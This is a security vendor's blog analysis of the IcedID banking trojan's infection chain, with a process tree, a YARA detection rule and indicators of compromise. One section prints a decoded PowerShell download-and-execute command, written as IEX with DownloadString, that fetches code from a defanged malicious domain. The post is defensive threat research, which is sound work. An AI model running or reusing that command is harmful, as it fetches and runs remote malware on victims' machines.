Dissecting IcedID behavior on an infected endpoint

IcedID, also known as BokDot, is a banking trojan that was first discovered in 2017. It targets a victim’s financial information and it is also capable of dropping other malware, most commonly CobaltStrike. 

OpenText™ Cybersecurity Services observed a recent malspam campaign where IcedID was delivered via an archived zip file containing a Visual Basic script.  

The OpenText Services Team, as part of its threat research activities, continuously monitor how malware behaves on the endpoint and creates alerting content for the OpenText Managed Extended Detection and Response (MxDR) Service and its Managed Security Services customers. 

Infection Chain 

Upon execution of a malicious JavaScript associated with the IcedID infection, it calls the command interpreter to execute a base64 encoded Windows PowerShell. The PowerShell then communicates outbound to an IcedID redirect domain, followed by a download of a malicious DLL file. Next, the PowerShell executes the downloaded DLL using the Rundll process. And finally, the DLL is launches a Command and Control (C2) client that generates traffic with IcedID C2 server. 

WScript process interacting with a JavaScript in the users Download folder
Sigma Rule – Command and Scripting Visual Basic

Parent Process: C:\Windows\explorer.exe
Child Process: C:\Windows\System32\wscript.exe
CommandLine: C:\Windows\System32\WScript.exe:C:\Users\Administrator\Downloads\scan_contract.js

WScript process interacting with Cmd Process to execute PowerShell

Parent Process: C:\Windows\System32\wscript.exe
Child Process: C:\Windows\System32\cmd.exe

Command Interpreter interacting with PowerShell to run a Base64 Encoded script

Decoded Base64 Script:
IEX (New-Object Net.Webclient).downloadstring(“http://shisyatnic[.]top/gatef1.php”)

Parent Process: C:\Windows\System32\cmd.exe
Child Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Sigma Rule – Encoded PowerShell used to download and execute malicious DLL
PowerShell creating an outbound network connection to download IcedID DLL
IcedID redirect to malicious DLL download location
Download of malicious IcedID download
PowerShell executing downloaded DLL file
PowerShell executing DLL from Local Temp directory
Rundll creating an outbound network connection to IcedID C2
OpenText MDR Agent consistently scans and alerts to a host memory for the
execution on Unsigned or Untrusted DLL’s
Strings analysis of the dumped DLL from memory identifying strings commonly used in IcedID malicious DLL’s (Partial list shown)

Yara Rule for IcedID identification:

rule IcedID_Malware {
                author = “OpenText”
               description = “Detects IcedID”
           $s1 = “POST” fullword wide
           $s2 = “; _ga=” fullword wide
           $s3 = “; _u=” fullword wide
           $s4 = “; __io=” fullword wide
           $s5 = “; _gid=” fullword wide
           $s6 = “Cookie: _s=” fullword wide
              all of ($s*)

Indicators of Compromise:
IcedID Redirect Domain: shisyatnic[.]top/gatef1.php
IcedID DLL Hosting Domain: shisyatnic[.]top/dll/loader_p1_dll_64_n1_x64_inf.dll77.dll
IcedID C2: skanfordiporka[.]com
IcedID JavaScript: MD5 Hash – fb1a30af0da989004eaeeac8e72778df
IcedID DLL: MD5 Hash – 658f14c5d83de5e5fee5f5ae00087139

OpenText Cybersecurity Services

Upon detection of a malware, like IceID, OpenText recommends an Incident Response be carried out.  Our Consulting Team uses their extensive experience to threat hunt and remediate any suspected cyber attack.  Customers rely on OpenText for their Digital Forensics and Incident Response as well as our Risk & Compliance Advisory and Managed Security Services.  Learn more about our Services.

Leave a Reply

Your email address will not be published. Required fields are marked *